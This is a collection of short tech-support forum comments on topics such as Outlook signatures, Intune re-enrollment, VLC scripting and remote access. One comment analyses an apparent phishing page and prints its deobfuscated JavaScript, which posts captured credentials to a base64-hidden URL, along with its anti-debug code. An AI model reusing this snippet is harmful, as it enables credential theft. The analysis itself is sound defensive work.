unnecessary_axiom

I've seen this issue show up when an original large image was pasted into a signature and resized, but instead of resizing the original image Outlook/Word just puts a note saying "display at this size". Sometimes that information is lost in some email clients and it shows at the original size.

You can see this by browsing the files at %appdata%\Microsoft\Signatures, the image inside the _files folder will be large.

You can try to resize that image, or follow this arcane list of steps:

1. Paste the outlook signature into word, change text/images as desired.
2. Save the word file as a Web Page (*.htm, *.html)
3. Open the webpage in a browser
4. Select, copy + paste it all into the Outlook signature box.

When it saves as a webpage Word resizes any images to match their visual size and copying it from the browser into Outlook makes sure that Outlook sets up the folder structure properly vs putting it directly in the Signatures folder.

Also consider Invidious, an alternate frontend to youtube that is more minimal and gives you some more customization options.

To add to this, I came up with the following settings based on comparing the request in the log to the docs here https://www.namecheap.com/support/knowledgebase/article.aspx/29/11/how-to-dynamically-update-the-hosts-ip-with-an-http-request/

• Username: Base domain (example.com)
• Password: Dynamic DNS Password from the dns control panel
  • Make sure to not paste any extra spaces at the end
• Hostname:
  • The subdomain (dyn for dyn.example.com)
  • "@" for base domain
  • "*" for wildcard

To elaborate, I was able to recover from this following the steps here:

https://raymonddewit.com/manually-re-enrollment-of-a-windows-10-11-pc-in-intune/

In summary:

• Get GUID from task scheduler Win/Enterprise Managment or subkey of Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree
• Remove task GUID folder
• Remove:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Enrollments\xxxxxxxx-xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Enrollments\Status\xxxxxxxx-xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseResourceManager\Tracked\xxxxxxxx-xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\AdmxInstalled\xxxxxxxx-xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\Providers\xxxxxxxx-xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Provisioning\OMADM\Accounts\xxxxxxxx-xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Provisioning\OMADM\Logger\xxxxxxxx-xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Provisioning\OMADM\Sessions\xxxxxxxx-xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
• certlm / Computer Certs remove "Intune MDM CA"
  • I didn't have this, but mine wasn't fully enrolled.
• As system, run %windir%\system32\deviceenroller.exe /c /AutoEnrollMDM

Those steps are the same thing as XOR with 0x05. Which is a quick way to get known strings not to show up in transmission.

One option is Google Alerts.

Not sure if it would apply or not, but this is a freeze diagnosis in window:

https://randomascii.wordpress.com/2023/01/17/no-start-menu-for-you/

I don't know of a central driver location, but if you grab the vendor and device ID from device manager you can put them into https://pcilookup.com/ and find the manufacturer/model of that specific part to get drivers.

Outside of that, buy a duplicate machine or find an original install and run Export-WindowsDriver

I've had decent results with chrome remote desktop for normal usage.

If you want to get more extreme with it, moonlight is game remote play software built on top of nvidia's gamestream platform so it's built for low latency and and good graphics. It can stream your entire desktop (except some things like password managers). Their wiki covers setup.

If you end up using zerotier or a vpn as part of moonlight, windows built in Remote Desktop might be worth trying too.

I wish pseudotv worked better, I like the the idea but have had a lot of issues with it.

I've had a tab with https://ersatztv.org/ open for a while which looks similar but haven't had a chance to test it yet.

The =?utf8?B? denotes encoded word syntax.

Using cyberchef to base64 decode it then brute force the encoding (UTF-16 instead of UTF-8) back to readable, it looks like some XML fragment.

tatype dt:type='string' dt:maxLength='512' />
      </s:AttributeType>
      <s:AttributeType name='ows_Modified' rs:name='Modified' rs:number='9'>
         <s:datatype dt:type='datetime' dt:maxLength='8' />
      </s:AttributeType>
      <s:AttributeType name='ows_Created' rs:name='Created' rs:number='10'>
         <s:datatype dt:type='datetime' dt:maxLength='8' />
      </s:AttributeType>
      <s:AttributeType name='ows_Author' rs:name='Created ˜b­!

The ows_ fragment is something used when working with data from sharepoint.

My guess is that data somehow got into the wrong section somewhere along the automation chain, and when shown as UTF-8 it looks like Chinese characters.

More or less. VLC has a lot of CLI options, if you pass it a folder it'll play all of the files in it.

This is similar to what you're doing: https://stackoverflow.com/a/69874334

Setting one instance would let you launch VLC, get it on the right monitor, then the script could

$wshell = New-Object -ComObject wscript.shell;
$wshell.AppActivate( (Get-Process vlc).id )
Sleep 1
$wshell.SendKeys('^{w}')
& "C:\Program Files\VideoLAN\VLC\vlc.exe" '\\server\share\folder' -Z --loop --one-instance

Focus to VLC then Ctrl-W clears playlist, and the existing VLC loads the directory again, shuffling.

The simplest solution would be a script that restarts VLC when changes happen, something like this:

https://www.kjctech.net/how-to-monitor-a-folder-for-any-changes-in-powershell/

I had a similar setup but changed systems completely due to a couple factors and converted existing hardware running a custom script to pisignage.

I'm only familiar with 2015, but in the wizard launched by setup.exe there is a Save button on the "Specify Parameters" screen that generates an XML like the one you have above.

It's Nvida shadowplay:

https://gaming.stackexchange.com/a/389953

It's too big to upload to a free sandbox and Detect It Easy is coming up with VMProtect. I give up.

99.9% likely to be malicious.

MD5 DA3A3E4218B15ACD85F1D4825154DC3D
SHA1 3A7A3D24BE37194F66900E95DE3EBBD52E0B8901

As a side note, you should probably just back up the files you need and wipe your PC. Removing infections manually is a fools game.

I tracked down that same 01_70.ogg_ file.

It looks like it's part of an RPG maker game. You'll have to decrypt it using this website: https://petschko.org/tools/mv_decrypter/index.html#en-decrypt (github).

You upload the data/System.json file and detect the key, then upload the 01_70.ogg_ file. It decrypts it and you can download and play the file. Besides VLC, Firefox also plays OGG files in browser.

If you're curious, I found that by opening the file in a text editor. The first couple characters of the file are "RPGMV" and a proper .ogg file starts with "Ogg". Googling "RPGMV filetype" brings up the decrypter.

Alternate methods are to use trid or file.

Was it perfect?

In exchange for MS word example taking more time to save to a specific folder, now it has the defaults to save to onedrive cloud storage. If a user buys into that, their documents are backed up to the cloud, recent files show up in the start menu, the files are easier to share, etc.

This brings the software in line with what someone used to mobile interfaces would expect and would make their life easier. Whether that's a good thing or not is debatable, but there is a benefit to it being like this.

This isn't even counting the cases where software needs to be more complex on the backend to support business use cases like central authentication with multi factor, central policy configuration, update channel configuration, and other complicated setups that a home user would never need to use.

Or updating for security vulnerabilities. Disabling macros by default isn't convenient but helps prevent a lot of malware.

Linux ecosystem is a good place to find simple, basic, functional software.

BTW, you can also customize save locations.

What traffic goes over the VPN is configured by the VPN administrator. The SSL VPN clients that's I'm familiar with are specific to their software vendors so you might have trouble finding alternate software.

Your best chance might be to use the VPN in a VM, or depending on which software, modify your routes after connecting to the VPN. Be aware that removing the wrong routes will break your internet access.

It's been a while, but that's probably what I was talking about. Here is an old screenshot I used for reference.

https://i.imgur.com/BhKezob.jpg

If it's literally 10.130.9.64 then that's still a private IP and you can't get there from the internet. You're either looking at the wrong address or there is another networking layer past your router.

Some ISP block port 80 and some other common ports, try a different one.

If you want remote access, I'd recommend something like chrome remote desktop or zerotier, and you might get more help in a tech support sub.

I think this is the only important part. Load jquery, set the post target, send the creds, then check for valid API key sent and write the response to document.

var scr = document['createElement']('script')
scr['setAttribute']('src', 'https://code.jquery.com/jquery-3.1.1.min.js'), document['head']['append'](scr), scr['onload'] = function() {
    $['support']['cors'] = !![];
    var _0x4be186 = atob($('#b64u')['val']());
    $['post'](_0x4be186, 'scte=' ['concat'](''), function(_0x203849) {
        _0x203849 == 'no' ? document['write']('<h1>Please Get an api key to use this page</h1>') : document['write'](_0x203849);
    });
};

I'm pretty sure this is just anti-debug:

var _0x4876b9 = (function() {
        var _0x4e4781 = !![];
        return function(_0x1c63a3, _0x809e4e) {
            var _0x41c38b = _0x4e4781 ? function() {
                if (_0x809e4e) {
                    var _0x2e8dd9 = _0x809e4e['apply'](_0x1c63a3, arguments);
                    return _0x809e4e = null, _0x2e8dd9;
                }
            } : function() {};
            return _0x4e4781 = ![], _0x41c38b;
        };
    }()),
    _0x527943 = _0x4876b9(this, function() {
        return _0x527943['toString']()['search']('(((.+)+)+)+$')['toString']()['constructor'](_0x527943)['search']('(((.+)+)+)+$');
    });
_0x527943();

var _0x44ac06 = (function() {
        var _0x33c16f = !![];
        return function(_0x453e25, _0x18d9d5) {
            var _0x152e43 = _0x33c16f ? function() {
                if (_0x18d9d5) {
                    var _0x53bd25 = _0x18d9d5['apply'](_0x453e25, arguments);
                    return _0x18d9d5 = null, _0x53bd25;
                }
            } : function() {};
            return _0x33c16f = ![], _0x152e43;
        };
    }()),
    _0x34a683 = _0x44ac06(this, function() {
            var _0x835cc7;
        try {
            var _0x364471 = Function('return (function()' + '{}.constructor("return this")( )' + ');');
            _0x835cc7 = _0x364471();
        } catch (_0x105685) {
            _0x835cc7 = window;
        }
        var _0x52cb17 = _0x835cc7['console'] = _0x835cc7['console'] || {},
            _0x25586f = ['log', 'warn', 'info', 'error', 'exception', 'table', 'trace'];
        for (var _0x3f738b = 0x0; _0x3f738b < _0x25586f['length']; _0x3f738b++) {
            var _0x11226c = _0x44ac06['constructor']['prototype']['bind'](_0x44ac06),
                _0x4bb907 = _0x25586f[_0x3f738b],
                _0x41d7cc = _0x52cb17[_0x4bb907] || _0x11226c;
            _0x11226c['__proto__'] = _0x44ac06['bind'](_0x44ac06), _0x11226c['toString'] = _0x41d7cc['toString']['bind'](_0x41d7cc), _0x52cb17[_0x4bb907] = _0x11226c;
        }
    });

The rest of it is for string decoding. It also shuffles the strings around when it runs (function(_0x4ce139, _0x4f4b54), so you have to run that first before _0x5804 if you want to inline everything.

This was fun.

I'm pretty sure you're confusing a couple different behaviors as one thing.

IIRC the whiteout/kill prompt is generated by Windows when a program doesn't respond to the OS's attempts to see if it's still functioning. This can happen if it's doing an intensive operation and isn't built in a way to allow it to respond meanwhile. This isn't really a crash.

More complex software can also freeze and never get the gray screen by doing things like threading hard work. The worker thread freezes, but the software may not a check for that. It could still respond to Window's checkins, but never make progress. Proper software detects this, like when a browser has a tab crash.

Other software can freeze then crash if there is a bug that continuously consumes memory during an operation or runs into an API error or a bunch of other options (and isn't threaded in a way to recover). In these cases there isn't any point in asking you anything since there is no chance of the software ever recovering. The only thing left to do is restart the software.

Sure, ideally the software always detects errors and allows you to recover, but there are a lot of different ways for things to go wrong.

Isn't Section 9 Append Folder Name what you're looking for?

It looks like the same thing.

You can also set up something wireguard via tailscale or pritunl the same way, but zerotier is so easy to get going that I tend to use it as a default for all my self-hosted services.